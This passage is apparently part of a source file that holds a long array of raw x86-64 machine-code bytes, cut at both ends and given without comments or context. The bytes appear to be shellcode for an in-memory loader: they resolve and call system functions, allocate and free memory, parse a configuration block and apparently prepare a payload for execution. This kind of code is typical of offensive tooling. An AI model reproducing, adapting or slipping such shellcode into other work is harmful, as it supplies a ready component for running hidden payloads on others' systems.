8 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b,
9 0x50, 0x28, 0x48, 0x8b, 0x85, 0xa0, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd0,
10 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x04, 0x00, 0x00, 0xe8, 0x21,
11 0x15, 0x00, 0x00, 0x48, 0x89, 0x85, 0x98, 0x04, 0x00, 0x00, 0x48, 0x83,
12 0xbd, 0x98, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x89, 0x00, 0x00, 0x00,
13 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
14 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x04, 0x00, 0x00,
15 0x4c, 0x8b, 0x8d, 0xc0, 0x04, 0x00, 0x00, 0x4c, 0x8d, 0x05, 0xfc, 0x00,
16 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00,
17 0xff, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85,
18 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
19 0x89, 0x85, 0xa0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00,
20 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48, 0x8b, 0x85, 0xa0, 0x04, 0x00, 0x00,
21 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x04, 0x00,
22 0x00, 0xe8, 0x9a, 0x14, 0x00, 0x00, 0x48, 0x89, 0x85, 0x90, 0x04, 0x00,
23 0x00, 0x48, 0x83, 0xbd, 0x88, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x8b,
24 0x00, 0x00, 0x00, 0xeb, 0x0c, 0x48, 0xc7, 0xc0, 0xff, 0xff, 0xff, 0xff,
25 0xe9, 0x84, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x80, 0x04, 0x00, 0x00,
26 0x00, 0x74, 0x73, 0x48, 0x83, 0xbd, 0x90, 0x04, 0x00, 0x00, 0x00, 0x74,
27 0x69, 0xc7, 0x45, 0xe0, 0x0b, 0x00, 0x10, 0x00, 0x48, 0x8b, 0x85, 0x90,
28 0x04, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc1, 0x48, 0x8d, 0x45, 0xb0,
29 0x4c, 0x8b, 0x85, 0x80, 0x04, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x41, 0xff,
30 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x08,
31 0x02, 0x00, 0x00, 0x48, 0x89, 0x85, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x8b,
32 0x45, 0x48, 0x48, 0x83, 0xe0, 0xf0, 0x48, 0x89, 0x45, 0x48, 0x48, 0x8d,
33 0x45, 0xb0, 0x4c, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00, 0xba, 0x00, 0x00,
34 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0xeb, 0x0c, 0x48, 0x8b,
35 0x8d, 0xc0, 0x04, 0x00, 0x00, 0xe8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x8b,
36 0x85, 0xa8, 0x04, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x30, 0x05, 0x00, 0x00,
37 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8d,
38 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0xa0, 0x01, 0x00,
39 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48,
40 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
41 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48, 0x8b, 0x85, 0x68, 0x01, 0x00,
42 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01,
43 0x00, 0x00, 0xe8, 0x9d, 0x13, 0x00, 0x00, 0x48, 0x89, 0x85, 0x60, 0x01,
44 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40,
45 0x50, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0,
46 0x01, 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48, 0x8b, 0x85, 0x68, 0x01,
47 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0,
48 0x01, 0x00, 0x00, 0xe8, 0x60, 0x13, 0x00, 0x00, 0x48, 0x89, 0x85, 0x58,
49 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b,
50 0x80, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00,
51 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48,
52 0x8b, 0x85, 0x68, 0x01, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2,
53 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0x20, 0x13, 0x00, 0x00,
54 0x48, 0x89, 0x85, 0x50, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x60, 0x01,
55 0x00, 0x00, 0x00, 0x74, 0x14, 0x48, 0x83, 0xbd, 0x58, 0x01, 0x00, 0x00,
56 0x00, 0x74, 0x0a, 0x48, 0x83, 0xbd, 0x50, 0x01, 0x00, 0x00, 0x00, 0x75,
57 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xa1, 0x08, 0x00, 0x00, 0x48,
58 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b,
59 0x85, 0x60, 0x01, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41,
60 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
61 0x48, 0x89, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x01,
62 0x00, 0x00, 0x00, 0x75, 0x2a, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
63 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x0e, 0x48,
64 0x8b, 0x85, 0x50, 0x01, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff,
65 0xd0, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x41, 0x08, 0x00, 0x00, 0x48,
66 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x48,
67 0x01, 0x00, 0x00, 0x41, 0x89, 0xd0, 0x48, 0x8b, 0x95, 0xa0, 0x01, 0x00,
68 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xb3, 0x61, 0x00, 0x00, 0x48, 0x8b, 0x85,
69 0x48, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
70 0x8d, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
71 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x47, 0x61, 0x00,
72 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x04, 0x02,
73 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x92, 0x00, 0x00, 0x00, 0x48,
74 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x10, 0x02, 0x00, 0x00,
75 0x48, 0x89, 0x85, 0x40, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
76 0x00, 0x00, 0x8b, 0x00, 0x44, 0x8d, 0x80, 0xf0, 0xfd, 0xff, 0xff, 0x48,
77 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x14, 0x48, 0x8b,
78 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x8d,
79 0x40, 0x01, 0x00, 0x00, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89,
80 0xc1, 0xe8, 0x2e, 0x6e, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
81 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x95, 0xa0, 0x01, 0x00, 0x00,
82 0x48, 0x8d, 0x8a, 0x00, 0x0c, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xee,
83 0x6a, 0x00, 0x00, 0x48, 0x89, 0x85, 0x38, 0x01, 0x00, 0x00, 0x48, 0x8b,
84 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x00, 0x0d, 0x00, 0x00,
85 0x48, 0x39, 0x85, 0x38, 0x01, 0x00, 0x00, 0x0f, 0x85, 0xe6, 0x05, 0x00,
86 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28,
87 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x49,
88 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00,
89 0xe8, 0x77, 0x11, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x01, 0x00, 0x00,
90 0x48, 0x89, 0x42, 0x30, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
91 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff,
92 0xff, 0xe9, 0x02, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
93 0x00, 0x48, 0x05, 0x14, 0x02, 0x00, 0x00, 0x48, 0x89, 0x85, 0x78, 0x01,
94 0x00, 0x00, 0xc7, 0x85, 0x8c, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
95 0xeb, 0x24, 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78,
96 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85, 0x8c,
97 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xd0, 0x83, 0x85, 0x8c, 0x01, 0x00,
98 0x00, 0x01, 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78,
99 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
100 0x23, 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x01,
101 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x3b, 0x74, 0x0c,
102 0x81, 0xbd, 0x8c, 0x01, 0x00, 0x00, 0x03, 0x01, 0x00, 0x00, 0x76, 0xa2,
103 0x83, 0xbd, 0x8c, 0x01, 0x00, 0x00, 0x00, 0x74, 0x35, 0x8b, 0x85, 0x8c,
104 0x01, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x78,
105 0x01, 0x00, 0x00, 0x8b, 0x85, 0x8c, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05,
106 0xd0, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
107 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xa5, 0x0a, 0x00, 0x00, 0xe9, 0x58, 0xff,
108 0xff, 0xff, 0x90, 0xc7, 0x85, 0x8c, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00,
109 0x00, 0xe9, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
110 0x00, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
111 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b,
112 0x04, 0xd0, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0,
113 0x01, 0x00, 0x00, 0xe8, 0x54, 0x10, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0,
114 0x01, 0x00, 0x00, 0x8b, 0x8d, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc1,
115 0x06, 0x48, 0x89, 0x04, 0xca, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
116 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b,
117 0x04, 0xd0, 0x48, 0x85, 0xc0, 0x75, 0x38, 0x48, 0x8b, 0x85, 0xa0, 0x01,
118 0x00, 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85,
119 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b,
120 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x04,
121 0xd0, 0x48, 0x39, 0x85, 0x68, 0x01, 0x00, 0x00, 0x0f, 0x85, 0x38, 0x04,
122 0x00, 0x00, 0x90, 0x83, 0x85, 0x8c, 0x01, 0x00, 0x00, 0x01, 0x48, 0x8b,
123 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x10, 0x02, 0x00, 0x00, 0x39,
124 0x85, 0x8c, 0x01, 0x00, 0x00, 0x0f, 0x82, 0x47, 0xff, 0xff, 0xff, 0x48,
125 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00,
126 0x83, 0xf8, 0x02, 0x75, 0x2b, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00,
127 0xe8, 0x52, 0x10, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xf4, 0x03, 0x00,
128 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x30,
129 0x0d, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x01, 0x00, 0x00, 0xeb, 0x3c,
130 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00,
131 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x84, 0xca, 0x03, 0x00, 0x00, 0x48, 0x8b,
132 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83,
133 0xf8, 0x01, 0x75, 0x14, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
134 0x05, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x01, 0x00, 0x00,
135 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00,
136 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xba, 0xa4, 0x0f, 0x00, 0x00,
137 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x70, 0x01,
138 0x00, 0x00, 0x48, 0x8b, 0x95, 0x70, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
139 0xa0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x90, 0xf8, 0x01, 0x00, 0x00, 0x48,
140 0x83, 0xbd, 0x70, 0x01, 0x00, 0x00, 0x00, 0x75, 0x2a, 0x48, 0x8b, 0x85,
141 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8,
142 0x02, 0x75, 0x0e, 0x48, 0x8b, 0x85, 0x50, 0x01, 0x00, 0x00, 0xb9, 0x00,
143 0x00, 0x00, 0x00, 0xff, 0xd0, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x95,
144 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80,
145 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x0f, 0x84, 0x93, 0x00, 0x00,
146 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xc4, 0x56, 0x00,
147 0x00, 0x89, 0x85, 0x34, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x34, 0x01, 0x00,
148 0x00, 0x00, 0x75, 0x16, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b,
149 0x80, 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0xf1, 0x02,
150 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xdd, 0x58,
151 0x00, 0x00, 0x89, 0x85, 0x34, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x34, 0x01,
152 0x00, 0x00, 0x00, 0x75, 0x16, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
153 0x8b, 0x80, 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0xc3,
154 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xbb,
155 0x58, 0x00, 0x00, 0x89, 0x85, 0x34, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x34,
156 0x01, 0x00, 0x00, 0x00, 0x75, 0x16, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
157 0x00, 0x8b, 0x80, 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84,
158 0x95, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b,
159 0x40, 0x08, 0x83, 0xf8, 0x01, 0x0f, 0x84, 0x8d, 0x01, 0x00, 0x00, 0x48,
160 0xc7, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
161 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x89,
162 0xc0, 0x48, 0x05, 0x2f, 0x15, 0x00, 0x00, 0x48, 0x25, 0x00, 0xf0, 0xff,
163 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8d, 0x4d, 0xc8, 0x48, 0x8d, 0x85,
164 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x70, 0x01, 0x00, 0x00, 0x48,
165 0x89, 0x54, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x04, 0x00, 0x00, 0x00,
166 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41,
167 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff,
168 0xff, 0xff, 0xff, 0xe8, 0x1b, 0x65, 0x00, 0x00, 0x89, 0x85, 0x30, 0x01,
169 0x00, 0x00, 0x83, 0xbd, 0x30, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x09,
170 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b,
171 0x95, 0x80, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x30, 0x05, 0x00, 0x00, 0x48,
172 0x89, 0xc1, 0xe8, 0xd5, 0x5c, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
173 0x00, 0x00, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x03, 0x74, 0x13, 0x48, 0x8b,
174 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x04, 0x0f,
175 0x85, 0x93, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
176 0x4c, 0x8b, 0x90, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
177 0x00, 0x00, 0x8b, 0x88, 0x20, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80,
178 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x88, 0x28, 0x05, 0x00, 0x00, 0x48, 0x8b,
179 0x85, 0x80, 0x01, 0x00, 0x00, 0x44, 0x8b, 0x98, 0x24, 0x05, 0x00, 0x00,
180 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x28, 0x05,
181 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x08,
182 0x83, 0xe8, 0x01, 0x80, 0xcc, 0x01, 0x0f, 0xb7, 0xc0, 0x4c, 0x8d, 0x85,
183 0x24, 0x01, 0x00, 0x00, 0x4c, 0x89, 0x44, 0x24, 0x28, 0x89, 0x4c, 0x24,
184 0x20, 0x45, 0x89, 0xd8, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x2c,
185 0x01, 0x00, 0x00, 0x83, 0xbd, 0x2c, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85,
186 0x4b, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48,
187 0x89, 0x85, 0x80, 0x01, 0x00, 0x00, 0xeb, 0x40, 0x48, 0x8b, 0x85, 0x80,
188 0x01, 0x00, 0x00, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x02, 0x75, 0x31, 0x48,
189 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x28, 0x05, 0x00,
190 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x05, 0x28, 0x05,
191 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xe0, 0x58, 0x00, 0x00, 0x48, 0x8b,
192 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x01, 0x00, 0x00,
193 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x03,
194 0x74, 0x0e, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83,
195 0xf8, 0x04, 0x75, 0x1b, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48,
196 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xf5, 0x24,
197 0x00, 0x00, 0xe9, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
198 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0e, 0x48, 0x8b, 0x85,
199 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x5c, 0x48,
200 0x8d, 0x95, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00,
201 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01,
202 0x00, 0x00, 0xe8, 0x87, 0x15, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x20, 0x48,
203 0x8d, 0x95, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00,
204 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01,
205 0x00, 0x00, 0xe8, 0xe8, 0x1a, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xe0, 0x00,
206 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00,
207 0xe8, 0x5d, 0x22, 0x00, 0x00, 0xeb, 0x50, 0x48, 0x8b, 0x85, 0x80, 0x01,
208 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x05, 0x74, 0x0e, 0x48, 0x8b, 0x85,
209 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x33, 0x48,
210 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
211 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xc3, 0x40, 0x00, 0x00, 0xeb, 0x1c, 0x90,
212 0xeb, 0x19, 0x90, 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90, 0xeb, 0x10, 0x90,
213 0xeb, 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90,
214 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80,
215 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x74, 0x16, 0x48, 0x8b, 0x85,
216 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8,
217 0x03, 0x0f, 0x85, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
218 0x00, 0x00, 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x85, 0xc0,
219 0x74, 0x7d, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
220 0x28, 0x0d, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
221 0x00, 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x41, 0x89, 0xd0, 0xba,
222 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x34, 0x5a, 0x00, 0x00,
223 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0,
224 0x01, 0x00, 0x00, 0x48, 0x05, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x4d,
225 0xc8, 0x48, 0x8b, 0x95, 0x70, 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
226 0x20, 0x41, 0xb9, 0x00, 0x80, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89,
227 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x7e, 0x62, 0x00,
228 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x80, 0x30,
229 0x0d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
230 0x00, 0x00, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f,
231 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0x28, 0x01, 0x00, 0x00, 0x48,
232 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x41, 0x89, 0xc0, 0xba,
233 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8,
234 0xac, 0x59, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
235 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x85,
236 0x58, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00,
237 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0x58, 0x01, 0x00, 0x00,
